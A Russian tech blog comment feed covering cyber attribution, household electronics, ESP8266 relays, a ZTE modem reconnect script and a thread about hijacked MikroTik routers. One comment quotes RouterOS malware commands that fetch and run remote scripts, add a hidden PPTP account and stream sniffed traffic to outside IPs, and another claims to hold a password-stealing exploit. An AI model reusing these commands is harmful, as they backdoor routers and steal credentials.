avatar
«США виновных всегда знают заранее. Их перечень включает всего четыре страны – Россию, Китай, Северную Корею и Иран. Видимо, из опасения разоблачения США отказываются от двусторонних экспертных консультаций с Россией, ведь они могут показать безосновательность их политических решений», — сказал он на брифинге в МИА «Россия сегодня».
По его словам, разведывательное сообщество США «даже при недостатке доказательств берет на себя смелость обвинить другую страну в компьютерной атаке».
«При этом делается оговорка: „Мы предполагаем“. В остальных случаях используются две формулировки „почти наверняка“ и „весьма вероятно“», — отметил Мурашов.
avatar
Спустя почти год, тот самый аккумулятор показал себя и окончательно просел до 3 Ампер, остальные в норме.
Поменял 1 элемент и он зашевелился вновь, но чувствуется ещё два элемента на подходе.
В аккумуляторные электровеники я уже наигрался, всё сводится к тому, что рано или поздно всёровно надо менять аккумуляторы! Это факт.
По цене нового аккумулятора 18V я купил новый более удобный, стильный и практичный электровеник с питанием от сети 220в.
А старый тяжеленный Электролюкс идёт на разборку и в помойку! Ё
сравнение электрощёток
avatar
Сделал подобный вариант с 8ми канальным твердотельным реле.

esp8266 omron твердотельное реле.
Использовал пины GPIO
led1 = 3 — жпио 0
led2 = 4 — жэпио 2
led5 = 1 — жэпио 5
led4 = 2 — жэпио 4

led13 = 7 — жпио 13
led12 = 6 — жэпио 12
led14 = 5 — жэпио 14
led16 = 0 — жэпио 16
Но глюки были у ESP с наводками на ноги и срабатыванием релюх, пришлось подтяжку делать как нестранно на плюс.
avatar
Понаблюдав пару дней за глупыми хацкерскими ботнетами сделал вывод — во всём виноваты американские хацкеры!
Вот Вам скриншоты самых атакующих стран
атаки американских хакеров, ботнет американцев, хацкеры
атаки американских хакеров, ботнет американцев, хацкеры
атаки американских хакеров, ботнет американцев, хацкеры
avatar
При использовании модема ZTE MF667 часто отключался модем от Интернета сам и автоматом не подключался.
Этим славятся многие модемы ZTE и чтобы модем переподключался автоматически требуется в браузере ввести команду.
Вобщем это очень просто
создаём файл например в том же каталоге
cd /etc/config/rezerv/
vi modem.sh
wget -qO- http://192.168.0.1/goform/goform_set_cmd_process?goformId=CONNECT_NETWORK > /dev/null

chmod 777 modem.sh

В планировщик закидываю с новой строки ещё одно задание
*/10 * * * * /etc/config/rezerv/modem.sh

______________________________________________
IP-адрес 192.168.0.1
Версия ПО WEB_TELE2RUSMF667V1.0.0B01
Версия ПО устройства BD_HDMF667V1.0.0B01
Версия оборудования MF667-2.0.0
avatar
Поздравляю Вас, добро пожаловать в наши ряды. Если есть возможность то скидывайтесь под ноль и шейтесь новой прошивкой. От старых паролей ничего не оставлять, тока новые.
avatar
НА одной железке точно такая же хрень появилась
avatar
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}


/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"
avatar
Здравствуйте Денис.
redmi 4x?
Загрузчик разблокировали? Какой андроид?
avatar
Почему-то после перезагрузки следов SuperSU просто нет. RootChecker рут прав не обнаруживает.
avatar
mikrotik не принимает пароль.
Что делать? Как войти ?
avatar
можно и мне прогу, зайти на микрот не могу из за удаленности, что бы не останавливать работу хотелось бы восстановить все мейл it(собака)ecln.ru
avatar
Негодяй спамер, изыди в бан!
avatar
http://SPAMDELETED- раскрутить сайт цена - http://SPAMDELETED
avatar
А можете дать побаловаться? мэйл n.mikro(дог)yanxex.ru
avatar
Защищаться надо. Прописываем правила запретов от сканеров портов, прописываем порткнокинг многоуровневый, лучше всего белый список разрешенных адресов. Меняем порт, отключаем сервисы....
avatar
А оно тебе надо!? Ну есть у меня данный эксплоит, который показывает логины и пассы в МТ. Недавно на 6.38 не сработал почемуто....
avatar
Хренота творится с микротами! Пока всё не уляжется буду закрывать винбокс извне и менять порт.
avatar
6.42.6 - так же доступ потерян.
6.18 - успешно отбивает атаки.
avatar
Стояла самая последняя прошивка 6,43 доступ к микротику потерян, так что уязивимость присутствует